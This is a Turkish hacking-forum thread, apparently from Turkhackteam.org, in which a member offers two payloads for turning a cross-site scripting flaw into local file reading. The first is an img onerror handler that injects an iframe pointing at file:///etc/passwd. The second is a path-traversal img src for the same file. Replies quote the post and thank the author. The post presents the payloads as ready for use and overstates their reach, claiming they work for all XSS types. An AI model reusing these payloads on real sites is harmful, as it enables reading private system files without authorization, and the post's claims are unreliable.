XSS Açığını LFI'ye Çevirmek !

MuhammedTr768

MuhammedTr768

Kıdemli Üye
7 Kas 2021
2,933
1,815
31
MyKrallife
logo.png

Herkese Selamlar. Bugün sizlere XSS Açığını LFI'ye çevirmeyi anlatıp 2 tane payload vereceğim.
İlk öncelikle herkesin merak ettiği bir konuya değinmek istiyorum
----------------------------------------------------------------------------------------------------------------------------------------
Hangi XSS Türlerinde Geçerli ?
Tüm XSS Türlerinde Geçerli. Reflecteddan tutun Dom XSS'e kadar
-----------------------------------------------------------------------------------------------------------------------------------------
Şimdi ise payloadlarımıza bakalım
1:
JavaScript: 
<img src="kırmızı.png" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
Burada kırmızı.png dosyasını göstermek istiyor eğer yok ise etc/passwd dosyasını iframe içerisinde gösterecek
D2UvZWN.png

Veee muazzam sonuç :)
-----------------------------------------------------------------------------------------------------------------------
2:
(bunun için burp suite gerekmektedir)
HTML: 
<img src="/../../../../../../../../../../../../etc/passwd">
burada ise bize resim olarak etc/passwdyi gösteriyor. Burp suite üzerinden requesti incelediğimizde ise
etc/passwd gözükecektir


Beni dinlediğiniz için teşekkürler görüşürüz​
 
Muslukcu

Muslukcu

Katılımcı Üye
17 Kas 2021
699
262
Tesisat dükkanı
MuhammedTr768' Alıntı:
logo.png

Herkese Selamlar. Bugün sizlere XSS Açığını LFI'ye çevirmeyi anlatıp 2 tane payload vereceğim.
İlk öncelikle herkesin merak ettiği bir konuya değinmek istiyorum
----------------------------------------------------------------------------------------------------------------------------------------
Hangi XSS Türlerinde Geçerli ?
Tüm XSS Türlerinde Geçerli. Reflecteddan tutun Dom XSS'e kadar
-----------------------------------------------------------------------------------------------------------------------------------------
Şimdi ise payloadlarımıza bakalım
1:
JavaScript: 
<img src="kırmızı.png" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
Burada kırmızı.png dosyasını göstermek istiyor eğer yok ise etc/passwd dosyasını iframe içerisinde gösterecek
D2UvZWN.png

Veee muazzam sonuç :)

-----------------------------------------------------------------------------------------------------------------------

2:

(bunun için burp suite gerekmektedir)

HTML: 
<img src="/../../../../../../../../../../../../etc/passwd">

burada ise bize resim olarak etc/passwdyi gösteriyor. Burp suite üzerinden requesti incelediğimizde ise

etc/passwd gözükecektir





Beni dinlediğiniz için teşekkürler görüşürüz
Genişletmek için tıkla ...
Elinize sağlık
 
MuhammedTr768

MuhammedTr768

Kıdemli Üye
7 Kas 2021
2,933
1,815
31
MyKrallife
Yeni Kullanıcıyım Ben' Alıntı:
Eline sağlık ++
Genişletmek için tıkla ...
teşekkürler dostum
ANTROPİ' Alıntı:
Eline sağlık. Güzel konu
Genişletmek için tıkla ...
eyvallah
The Golge' Alıntı:
Eline sağlık Muhammed :)
Genişletmek için tıkla ...
teşekkürler hocam :)
Endarion' Alıntı:
Eline sağlık, cidden müthiş konu. Hep böyle özgün içerikler çıksa keşke. Instagram çalma, Phishing, Account Cracking falan script kiddie işleri.
Genişletmek için tıkla ...
çok sağol dostum devam edeceğim bu tür konulara, takipte kalın :D
 
Cevap yazmak için giriş yap yada kayıt ol.
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.